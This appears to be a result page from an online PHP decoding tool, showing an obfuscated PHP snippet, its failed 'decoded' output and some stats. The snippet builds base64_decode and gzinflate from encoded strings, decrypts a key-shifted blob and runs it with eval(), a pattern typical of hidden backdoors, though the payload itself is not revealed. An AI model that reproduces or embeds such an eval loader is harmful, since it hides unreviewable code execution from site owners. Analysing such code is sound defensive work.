Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function d($s, $k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($..
Decoded Output download
<?php
function d($s, $k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s, $i, 2)));$i=(float)($i)+2;}return $d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s, $i, 1);$kc=substr($k, ($i%strlen($k))-1, 1);$c=chr(ord($c)-ord($kc));$r.=$c;}return $r;}}eval(d("BcHLEsEwFADQP2PhBzARnRilhhX1Zo2VLdXeJiFtkxuiNfyic/i9zyS+oPRY1WuvT3tKPuvFiJHjuekraxPHGA46m8OO0DLcyEgh7w0qoYB5Z5EZ6mIU+KT83dGYO+AoeftWksTmlXnMh6JA3K6C22IZwLzvhz/DTcWduBQZgBdZkw6Lu/amjTqCfksXx5jHCVXZdcIhFRrGubIkrNUkRrpMoOXAXMbdQGYpfP3nQ5PZHw==", 652214260));
/* Encoded by dopunk oon */
?>
Did this file decode correctly?
Original Code
<?php
function d($s, $k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s, $i, 2)));$i=(float)($i)+2;}return $d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s, $i, 1);$kc=substr($k, ($i%strlen($k))-1, 1);$c=chr(ord($c)-ord($kc));$r.=$c;}return $r;}}eval(d("BcHLEsEwFADQP2PhBzARnRilhhX1Zo2VLdXeJiFtkxuiNfyic/i9zyS+oPRY1WuvT3tKPuvFiJHjuekraxPHGA46m8OO0DLcyEgh7w0qoYB5Z5EZ6mIU+KT83dGYO+AoeftWksTmlXnMh6JA3K6C22IZwLzvhz/DTcWduBQZgBdZkw6Lu/amjTqCfksXx5jHCVXZdcIhFRrGubIkrNUkRrpMoOXAXMbdQGYpfP3nQ5PZHw==", 652214260));
/* Encoded by dopunk oon */
?>
Function Calls
d | 361 |
Stats
MD5 | 8ce8fc0f776cfdfbd04584d349bbfcd6 |
Eval Count | 0 |
Decode Time | 3687 ms |